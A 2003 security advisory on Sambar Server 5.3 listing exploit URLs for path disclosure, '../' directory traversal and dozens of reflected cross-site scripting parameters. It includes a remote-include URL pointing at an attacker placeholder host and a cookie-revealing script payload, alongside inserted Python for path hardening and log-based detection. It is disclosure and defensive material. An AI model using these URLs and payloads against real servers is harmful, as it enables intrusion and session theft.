
SCSA012.txt

Posted Mar 29, 2003
Authored by Gregory Le Bras | Site Security-Corp.org

Security Corporation Security Advisory [SCSA-012]: The Sambar server default installation has a cgi-bin directory which contains executables that allow remote users to view information regarding the operating system and the web server's directory. It also has path disclosure and numerous cross site scripting vulnerabilities.

tags | exploit, remote, web, cgi, vulnerability, xss
SHA-256 | b897ec3ddb97840373628aa3bb5efc9f8c599d518df5000da8a5091885486a75

________________________________________________________________________

Security Corporation Security Advisory [SCSA-012]
________________________________________________________________________

PROGRAM: Sambar Server
HOMEPAGE: https://www.sambar.com/
VULNERABLE VERSIONS: 5.3 and prior
________________________________________________________________________


DESCRIPTION
________________________________________________________________________

"Sambar Server is the new standard in high performance multi-functional
servers with features rivaling other commercial products selling
separately for several hundreds of dollars. It's Winsock2 compliant Win32
integration functions on Windows 95, Windows 98, Windows NT, Win2000,
and XP as a service or as an application."
(direct quote from https://sambar.jalyn.net)


DETAILS & EXPLOITS
________________________________________________________________________


¤ Path Disclosure :

Sambar's default installation of the cgi-bin directory contains
a testcgi.exe and an environ.pl that allow remote users to view
information regarding the operating system and the
web server's directory.

These vulnerabilities can be triggered by a remote user submitting
a specially crafted HTTP request.


- Exploits :

https://[target]/cgi-bin/environ.pl

https://[target]/cgi-bin/testcgi.exe


Will produce the following output:

- environ.pl :
--------------

Sambar Server CGI Environment Variables
GATEWAY_INTERFACE: CGI/1.1
PATH_INFO:
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl
QUERY_STRING:
REMOTE_ADDR: 127.0.0.1
REMOTE_HOST:
REMOTE_USER:
REQUEST_METHOD: GET
DOCUMENT_NAME: environ.pl
DOCUMENT_URI: /cgi-bin/environ.pl
SCRIPT_NAME: /cgi-bin/environ.pl
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl
SERVER_NAME: localhost
SERVER_PORT: 80
SERVER_PROTOCOL: HTTP/1.1
SERVER_SOFTWARE: SAMBAR
CONTENT_LENGTH: 0
CONTENT:


- testcgi.exe :
---------------

Test CGI ... Version 1.00 [ build date 8-03-97 ]

QUERY_STRING
PATH_INFO
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe
SCRIPT_NAME /cgi-bin/testcgi.exe
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe
DOCUMENT_ROOT C:/sambar53/docs/
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
REMOTE_ADDR 127.0.0.1
REMOTE_HOST
SERVER_NAME localhost
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE SAMBAR
CONTENT_TYPE

----------------------------


¤ Directory Disclosure :

Other security vulnerabilities were found in Sambar which allow an
attacker to reveal the contents of files and directories
on the web server, even those that should not be revealed.

These vulnerabilities can be simply exploited by requesting a
specially crafted URL that calls the iecreate.stm and ieedit.stm
applications with a '../' appended.

- Exploits :

https://[target]/sysuser/docmgr/iecreate.stm?template=../

https://[target]/sysuser/docmgr/ieedit.stm?url=../


----------------------------


¤ Cross Site Scripting :

Many exploitable bugs were found in Sambar Server which cause script
execution on the client's computer when a crafted URL is followed.

This kind of attack, known as "Cross-Site Scripting", is
present in many sections of the web site; an attacker can inject
specially crafted links and/or other malicious scripts.

- Exploits :

https://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]

https://[target]/netutils/whodata.stm?sitename=[hostile_code]

https://[target]/netutils/findata.stm?user=[hostile_code]

https://[target]/netutils/findata.stm?host=[hostile_code]

https://[target]/isapi/testisa.dll?check1=[hostile_code]

https://[target]/cgi-bin/environ.pl?param1=[hostile_code]

https://[target]/samples/search.dll?query=[hostile_code]&logic=AND

https://[target]/wwwping/index.stm?wwwsite=[hostile_code]

https://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456

https://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]

https://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]

https://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]

https://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]

https://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/create.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/info.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/info.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/search.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/search.stm?query=[hostile_code]

https://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/template.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/update.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/update.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]

https://[target]/cgi-bin/testcgi.exe?[hostile_code]


- Another Cross Site Scripting issue can be exploited with a
remote file that includes the hostile code, like this :

https://[target]/sysuser/docmgr/ieedit.stm?url=https://[attacker]/hostile_file.htm


The hostile code could be :

[script]alert("Cookie="+document.cookie)[/script]

(opens a window showing the visitor's cookie.)

(replace [] by <>)
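The two unsafe behaviours described above have straightforward safe counterparts: a `template=`/`url=` value resolved strictly under a document root, with traversal segments and remote URLs rejected, and a reflected query value such as `ipaddr=` HTML-escaped before it is placed in the page. The following is an added example, not part of the advisory and not Sambar's code; the document root, the function names and the unsafe comparison function are assumptions made for illustration.

```python
"""Hardened counterparts to the two unsafe behaviours the advisory describes.

Added example, not Sambar's code. The document root, function names and the
unsafe comparison function are assumptions made for illustration.
"""
from __future__ import annotations

import html
import os
import posixpath
from urllib.parse import parse_qs

# Assumed document root. The advisory's sample output shows C:/sambar53/docs/;
# a relative, OS-neutral directory is used here so the example runs anywhere.
DOC_ROOT = os.path.abspath("sambar_docs")


def resolve_template(param: str, root: str = DOC_ROOT) -> str:
    """Map a 'template=' or 'url=' value to a file path strictly under root.

    Rejects empty values, NUL bytes, absolute paths, drive letters, URL
    schemes (the remote-file case in the advisory) and anything that still
    points outside root after '..' segments are collapsed.
    """
    if not param or "\x00" in param:
        raise ValueError("empty value or NUL byte in path parameter")
    if "://" in param or ":" in param or param.startswith(("/", "\\")):
        raise ValueError("absolute path, drive letter or URL not allowed")
    # Treat backslashes as separators too, then collapse '.' and '..'.
    norm = posixpath.normpath(param.replace("\\", "/"))
    if norm in (".", "..") or norm.startswith("../"):
        raise ValueError("path traversal attempt")
    full = os.path.abspath(os.path.join(root, *norm.split("/")))
    # Second check on the resolved path: it must still sit under root.
    if os.path.commonpath([root, full]) != root:
        raise ValueError("resolved path escapes document root")
    return full


def is_safe_template(param: str, root: str = DOC_ROOT) -> bool:
    """True when resolve_template() accepts the value."""
    try:
        resolve_template(param, root)
    except ValueError:
        return False
    return True


def reflected_unescaped(value: str) -> str:
    """The unsafe pattern behind the advisory's XSS list: the query value is
    copied straight into the markup, so '<' in the value becomes a tag."""
    return f"<p>Lookup for: {value}</p>"


def render_ipdata(query_string: str) -> str:
    """Safe version of a page that echoes the 'ipaddr' query parameter.

    The value is HTML-escaped (quotes included) before it is placed in
    element text, so it can only ever render as literal characters.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    ipaddr = params.get("ipaddr", [""])[0]
    safe = html.escape(ipaddr, quote=True)
    return ("<!DOCTYPE html><html><body>"
            f"<p>Lookup for: {safe}</p>"
            "</body></html>")


if __name__ == "__main__":
    for candidate in ("templates/default.htm", "../", "../../other.htm",
                      "https://203.0.113.10/hostile_file.htm"):
        verdict = "ok" if is_safe_template(candidate) else "rejected"
        print(f"{candidate!r:45} -> {verdict}")
    print(render_ipdata("ipaddr=<script>alert(1)</script>"))
```

The path check deliberately normalises before testing for `..` and then re-checks the resolved absolute path, so an encoded or backslash-separated traversal that survives one step is caught by the other; the escaping in `render_ipdata` is the element-text case only, and attribute or script contexts would need their own encoding.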


SOLUTIONS
________________________________________________________________________

No solution for the moment.
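Since the advisory lists no vendor fix, a compensating control on the defender's side is to watch the web server's access log for the request patterns described in the details above: hits on the default test CGIs, `..` or a remote URL in the docmgr `template=`/`url=` parameters, and markup in query values sent to the reflecting pages. The detection script below is an added example and is not part of the advisory; the log lines are constructed in Common Log Format, and the endpoint list is taken from the URLs in this advisory.

```python
"""Flag requests matching the patterns in SCSA-012 in a Common Log Format log.

Added example, not part of the advisory. The log lines are constructed;
the endpoint lists are taken from the advisory's URLs.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample traffic (not a real capture).
SAMPLE_LOG = """\
10.0.0.5 - - [29/Mar/2003:10:00:01 +0100] "GET /index.htm HTTP/1.1" 200 1532
10.0.0.7 - - [29/Mar/2003:10:00:05 +0100] "GET /cgi-bin/environ.pl HTTP/1.1" 200 612
10.0.0.7 - - [29/Mar/2003:10:00:09 +0100] "GET /sysuser/docmgr/ieedit.stm?url=../ HTTP/1.1" 200 2048
10.0.0.7 - - [29/Mar/2003:10:00:12 +0100] "GET /sysuser/docmgr/iecreate.stm?template=..%2F..%2F HTTP/1.1" 200 1877
10.0.0.9 - - [29/Mar/2003:10:00:20 +0100] "GET /netutils/ipdata.stm?ipaddr=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 901
10.0.0.9 - - [29/Mar/2003:10:00:25 +0100] "GET /sysuser/docmgr/ieedit.stm?url=http://203.0.113.10/hostile_file.htm HTTP/1.1" 200 1200
10.0.0.5 - - [29/Mar/2003:10:00:30 +0100] "GET /netutils/ipdata.stm?ipaddr=192.0.2.1 HTTP/1.1" 200 880
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Default test CGIs the advisory says disclose paths and environment data.
DEFAULT_TEST_CGIS = frozenset({"/cgi-bin/environ.pl", "/cgi-bin/testcgi.exe"})
# Document-manager pages whose template=/url= parameters accept '../'.
DOCMGR_PREFIX = "/sysuser/docmgr/"
# Other pages the advisory lists as reflecting query values into HTML.
REFLECTING_PAGES = frozenset({
    "/netutils/ipdata.stm", "/netutils/whodata.stm", "/netutils/findata.stm",
    "/isapi/testisa.dll", "/cgi-bin/environ.pl", "/samples/search.dll",
    "/wwwping/index.stm", "/syshelp/stmex.stm",
    "/syshelp/cscript/showfunc.stm", "/syshelp/cscript/showfncs.stm",
    "/syshelp/cscript/showfnc.stm", "/cgi-bin/testcgi.exe",
})
MARKUP_RE = re.compile(r"[<>]")


def classify(line: str) -> list[str]:
    """Return the list of findings for one log line (empty if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    path = unquote_plus(url.path).lower()
    # parse_qsl percent-decodes, so ..%2F and %3C are seen as ../ and <.
    params = parse_qsl(url.query, keep_blank_values=True)
    findings: list[str] = []
    if path in DEFAULT_TEST_CGIS:
        findings.append("default-test-cgi")
    if path.startswith(DOCMGR_PREFIX):
        for key, value in params:
            if key in ("template", "url"):
                if ".." in value.replace("\\", "/").split("/"):
                    findings.append(f"traversal:{key}")
                if "://" in value:
                    findings.append(f"remote-include:{key}")
    if path in REFLECTING_PAGES or path.startswith(DOCMGR_PREFIX):
        for key, value in params:
            if MARKUP_RE.search(value):
                findings.append(f"reflected-markup:{key}")
    # testcgi.exe echoes the raw query string, which need not be key=value.
    if path == "/cgi-bin/testcgi.exe" and MARKUP_RE.search(unquote_plus(url.query)):
        findings.append("reflected-markup:query")
    return findings


def scan(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client_ip, request_target, findings) for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            m = LOG_RE.match(line)
            hits.append((m["ip"], m["target"], findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(f"{ip} {target} -> {', '.join(findings)}")
```

Run against a real Sambar access log, the `default-test-cgi` finding is also a quick inventory check: any hit at all means the test CGIs the advisory describes are still installed and reachable.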


VENDOR STATUS
________________________________________________________________________

The vendor has reportedly been notified.


LINKS
________________________________________________________________________

- https://www.security-corp.org/index.php?ink=4-15-1

- French version :
https://www.security-corporation.com/index.php?id=advisories&a=012-FR


------------------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | https://www.Security-Corporation.com
------------------------------------------------------------------------





© 2024 Packet Storm. All rights reserved.